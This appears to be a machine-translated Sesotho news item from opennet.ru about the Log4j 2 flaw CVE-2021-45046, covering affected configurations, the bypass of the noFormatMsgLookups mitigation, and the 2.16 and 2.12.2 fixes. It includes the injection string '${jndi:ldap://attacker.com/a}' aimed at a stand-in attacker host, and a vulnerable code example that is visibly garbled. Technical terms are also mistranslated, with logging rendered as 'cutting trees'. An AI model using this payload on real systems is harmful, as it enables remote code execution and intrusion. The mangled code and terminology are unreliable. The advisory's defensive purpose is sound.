Kotsi e ncha (CVE-2021-45046) e fumanoe ts'ebetsong ea li-loko tsa JNDI ho laeborari ea Log4j 2. Kotsi ena e ntse e tsoela pele ho sa tsotellehe litokiso tse kentsoeng tokollong ea 2.15 le ho sa tsotelehe ts'ebeliso ea "log4j2.noFormatMsgLookup" ea ts'ireletso. Taba ena e ama haholo mefuta ea khale ea Log4j 2 e sirelelitsoeng ke folakha ea "noFormatMsgLookup", kaha e lumella ho feta ts'ireletso khahlano le tlokotsi e fetileng (Log4Shell, CVE-2021-44228), e lumellang ts'ebetso ea khoutu e seng molaong ho seva. Bakeng sa basebelisi ba mofuta oa 2.15, tlhekefetso e lekanyelitsoe ho bakang ho senyeha ha ts'ebeliso ka lebaka la mokhathala oa lisebelisoa tse teng.
Kotsi e iponahatsa feela ho litsamaiso tse sebelisang lipotso tsa tlhahlobo ea litaba (Context Lookup), joalo ka ${ctx:loginId}, kapa litempele tsa MDC (Thread Context Map), joalo ka %X, %mdc, le %MDC, bakeng sa ho rema lifate. Tšebeliso e kenyelletsa ho theha maemo bakeng sa data ea ho rema lifate e nang le li-substitutes tsa JNDI ha kopo e sebelisa lipotso tsa ho sheba maemo kapa litempele tsa MDC, tse hlalosang melao ea ho fomata bakeng sa tlhahiso ea ho rema lifate.
Bafuputsi ba LunaSec ba hlokometse hore bakeng sa liphetolelo tsa Log4j pele ho 2.15, ts'oaetso ena e ka sebelisoa e le vector e ncha ea tlhaselo bakeng sa Log4Shell, e lebisang ts'ebetsong ea khoutu haeba lipolelo tsa ThreadContext tse amohelang data ea ka ntle li sebelisoa ha ho rengoa lifate, ho sa tsotellehe hore na "noMsgFormatLookups" folakha kapa "%m" mokhoa oa tšireletso o nolofalletsa}
Phetoho e kenyelletsa ho beha "${jndi:ldap://attacker.com/a}" ka kotloloho polelong, ho sebelisoa boleng ba mofuta o mahareng o sebelisitsoeng molaong oa fomete ea li-log. Ka mohlala, haeba potso ea moelelo oa taba ${ctx:apiversion} e sebelisoa ho log output, tlhaselo e ka etsoa ka ho beha "${jndi:ldap://attacker.com/a}" ho boleng bo ngotsoeng ho apiversion variable. Mohlala oa khouto e tlokotsing: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @GetMapping(«/») public String index(@RequestHeader-Version a) The String index(@RequestHeader-Version a) "X-Apision" Sehlooho sa HTTP "X-Api-Version" se fetisetsoa ho ThreadContext ThreadContext.put(«apiversion», apiVersion); // Ha o hlahisa ho log, boleng ba ka ntle ba ho lahleheloa ke chelete bo tla sebetsoa ho sebelisoa ${ctx:apiversion} substitution logger.info(«E fumane kopo ea API version»); khutla "Lumela, lefatše!"; }
Ho Log4j 2.15, ho ba kotsing ho ka sebelisoa hampe ho etsa litlhaselo tsa DoS ha ho fetisetsoa boleng ho ThreadContext e bakang loop ea ts'ebetso ea template ea fomate.
Lintlafatso 2.16 le 2.12.2 li phatlalalitsoe ho fokotsa kotsi. Lekaleng la Log4j 2.16, ho kenyelletsa le litokiso tse kentsoeng tšebetsong ea mofuta oa 2.15 le ho tlama lipotso tsa JNDI LDAP ho "localhost," ts'ebetso ea JNDI e emisitsoe ka ho felletseng mme tšehetso ea lipaterone tsa phano ea melaetsa e tlositsoe. Tharollo e sisintsweng ke ho tlosa sehlopha sa JndiLookup ho sehlopha sa sehlopha (mohlala, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
O ka latela ponahalo ea litokiso liphuthelong maqepheng a kabo (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) le bahlahisi ba li-platform tsa Java (GitHub, Docker, Oracle, vmWare, Broadcom le Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, jj.).
Source: opennet.ru
